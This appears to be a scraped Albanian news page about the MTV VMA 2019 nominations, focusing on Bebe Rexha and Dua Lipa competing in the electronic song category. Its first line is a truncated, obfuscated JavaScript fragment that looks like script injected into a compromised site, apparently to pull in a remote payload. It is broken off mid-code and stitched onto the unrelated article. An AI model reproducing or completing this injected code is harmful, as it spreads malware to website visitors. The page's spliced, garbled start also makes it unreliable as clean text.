;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Bebe Rexha dhe Dua Lipa sërish në garë me njëra-tjetrën

By

MTV ka shpallur zyrtarisht nominimet për “MTV Video Music Awards 2019”.

Ariana Grande dhe Taylor Swift dominojnë me nga 10 nominime secila, në kategoritë e rëndësishme duke përfshirë “Videoja më e mirë e vitit, “Kënga më e mirë e vitit” dhe “Kënga më e mirë e zhanrit POP”.

Shfaqja e çmimeve është paraparë të mbahet të hënën e datës 26 gusht, në orën 20:00 (sipas orë lokale në ShBA).

“Ka qenë një vit i pabesueshëm në muzikë dhe ky grup i të nominuarve reflektojnë në mënyrë të përkryer peizazhin e pasur të muzikës pop”, tha në një deklaratë Bruce Gillmer, kreu i muzikës dhe talentit muzikor të Viacom dhe kreu i bashkë-markës MTV International.

Ky edicion i MTV VMA do të prezantohet nga komediani, aktori dhe autori më i shitur, Sebastian Maniscalco, dhe do të mbahet në Qendrën “Newark”, në New Jersey.

Eventet e ndryshme botërore nuk kanë se si bëhen pa shqiptarë, artistet Dua Lipa dhe Bebe Rexha edhe në MTV VMA 2019, kanë përfunduar të nominuara në të njëjtën kategori: “Kënga më e mirë elektronike”.

Bebe Rexha konkurron me dy këngë në këtë kategori: “Call You Mine” në bashkëpunim me The Chainsmokers si dhe “Say my name” në bashkëpunim me David Guettan dhe Jay Balvin.

Dua Lipa është e nominuar për këngën “Electricity” në bashkëpunim me Silk City, përkatësisht Mark Ronson edhe Diplo.

Artikuj të ngjashëm